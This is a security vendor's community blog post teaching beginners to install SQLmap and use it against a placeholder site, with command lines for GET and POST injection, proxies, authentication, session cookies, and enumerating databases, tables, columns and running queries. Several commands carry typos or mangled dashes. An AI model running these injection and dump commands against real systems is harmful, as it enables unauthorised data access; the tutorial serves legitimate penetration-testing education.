Changes to the community structure and the menu bar
Significant changes have happened to the structure of our community and our drop down menu bar. READ ABOUT IT HERE
Protect Your Assets
cancel

Owning SQLi vulnerability with SQLmap

Owning SQLi vulnerability with SQLmap

Contributor... CaroleLoomis Contributor...

SQLi (or SQL Injection) is defined as one of the most critical vulnerabilities when it comes to web application security. The attack is done by successfully inserting or injecting SQL statements on input fields or parameters coming from the end-user. A successful execution might lead the attacker to:

 

  • Bypass security, like the login page.
  • Expose sensitive information, which we refer to as a “data breach.”
  • Manipulate data (Add, Edit, Delete), data structures, db schemes, procedures and scripts depending on the severity of the vulnerability.

In some situations, it can lead to taking over the whole server itself by means of code execution and privilege escalation. Finding a SQLi vulnerable site or application is the first step, but exploiting and further digging is another thing. This blog aims to give you the nuts & bolts on using SQLmap and learn basic techniques to properly evaluate SQLi injections and understand some attack methods.

 

So let’s get started! We will be using SQLmap on Ubuntu Linux. If you want to use Pentest Distros that already has SQLmap that is fine. But for the sake of beginners who are new to Linux or folks who just started learning penetration testing, it would be a good foundation if you can install it by yourself. SQLmap runs on Python so it is not OS dependent.

 

 

Open the terminal and follow these simple steps:

 

  1. Download

wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz

 

2.  Extract

 

tar -xvf sqlmap.tar.gz && mv sqlmapproject* sqlmap && cd sqlmap && ls

 

                                                                                                                                                             

3.  Run version check

 

python sqlmap.py –version

 

Now we will proceed to the next phase.

 

If you want to view available commands and options available, you can use Python sqlmap.py –h  (for Basic) –hh  (for Advanced) options.

 

A quick note: Sometimes it can be overwhelming and a little confusing to see dozens of options or commands, especially when you’re trying to run a tool for the first time. Knowing the basics may not be enough for you to learn the whole shebang, but it will definitely help you get started.

 

Quick jump! There are two main methods that send parameters or data from client to the server: the GET and POST request. Both contain parameters with corresponding values and are areas that are vulnerable to SQLi injection.

 

GET request

In an HTTP GET request, parameters are sent as a query string format.

The structure looks like this:

 

ID <-- is a URL parameter

123 <- is the value of the parameter

 

Sometimes there are 2 or more parameters:

 

 

Parameter

Value

ID

321

category

20

section

10

 

 

Example: python sqlmapy.py –u “http://sqlivulnerable.com/product.php?ID=321&category=20&section=10”

 

POST request

A post request has capture/input fields or form objects/fields and is sent in the body. The usual content type is application/x-www-form-urlencoded.

 

Example: python sqlmapy.py –u http://sqlivulnerable.com/search.asp --forms

 

Note:
You can specify data to be posted with the following option:

--data=”category=1&section=2&search=aloha+milkyway”

 

If there is no data is specified, SQLmap will ask/fill the parameter’s value with randomly generated data.

 

We now have two basic examples of running SQLmap on GET and POST request but there are things that we may encounter in some circumstances.

 

Proxy

If we are behind a firewall and a proxy is needed to access the site/url/machine then we would need to specify the --proxy (http|https|socks4|socks5) supported.

 

Examples:

 

Using socks V5 proxy

sqlmap.py -u "https://www.sqlivulnerable.com/index.php?id=1" --proxy="socks5://mysuperproxy:8080"

Using socks V4 proxy

sqlmap.py -u "https://www.sqlivulnerable.com/index.php?id=1" --proxy="socks4://5.11.7.31:8080"

Using HTTP proxy

sqlmap.py -u "https:// www.sqlivulnerable.com/index.php?id=1" --proxy="http://11.12.13.14:3128"

 

Authentication

Some websites require authentication such as Basic, Digest or NTLM and for this, you can use --auth-type=BASIC  --auth-cred="username:password"

 

Example:

 

sqlmap.py -u "https:// www.sqlivulnerable.com/index.php?id=1" --proxy="http://11.12.13.14:3128" –auth-type=BASIC –auth-cred=”superuser:awesomepass123”

 

Valid session or valid login

In some cases, the target can only be injected and exploited if there is a valid credential or if an authenticated session is established. If we encounter this scenario, we can use –cookie.

 

Example:

 

 sqlmap.py -u "https:// www.sqlivulnerable.com/index.php?id=1” --cookie=”ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP”

 

DBMS type

Below is an example of SQL error that discloses the database type. Let us remember that each DMBS type consists of specifically designed or crafted payloads—knowing the type of database backend before running the attack would save tremendous amounts of time! We can specify the type using --dbms

 

Example:

 

sqlmap.py -u "https:// www.sqlivulnerable.com/index.php?id=1” --cookie=”ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP” –dbms=”Microsoft SQL Server”

 

Below is an example of successfully finding a valid injection point. Once we have this, we can go ahead and proceed with enumeration.

 

 

If we want to enumerate the entire database we can use –dbs

 

 

We did not successfully list the entire database.

 

 

Lets dig a little deeper: By enumerating tables of a specific database, we will use the –D to specify the database we want and the –table option to enumerate all tables.

 

Example: python sqlmap.py –url=http://sqlivulnerable.com --cookie=”ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP” –D transactions –tables

 

 

 

Let’s now enumerate columns of a specific table by specifying the tables using –T and adding --columns

 

Example: python sqlmap.py –url=http://sqlivulnerable.com --cookie=”ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP” –D transactions –T sample_tran_table --columns

 

 

Let’s do a select statement by using –SQL-query

python sqlmap.py –url=http://sqlivulnerable.com --cookie=”ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP” –sql-query=”select * from transactions.sample_tran_table”

 

 

We can also do searching using  --D | --T | --C and invoking –search option

Example:

python sqlmap.py –url=http://sqlivulnerable.com --cookie=”ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP” –C ID --search

 

 

That’s all for now. Hope you enjoyed this and learned something!

 

Posted on behalf of Medz Barao, Fortify on Demand Security Team.

About the Author

CaroleLoomis

Comments
N/A

Great post! Be nice if it was chapter one... 

 

 

hehe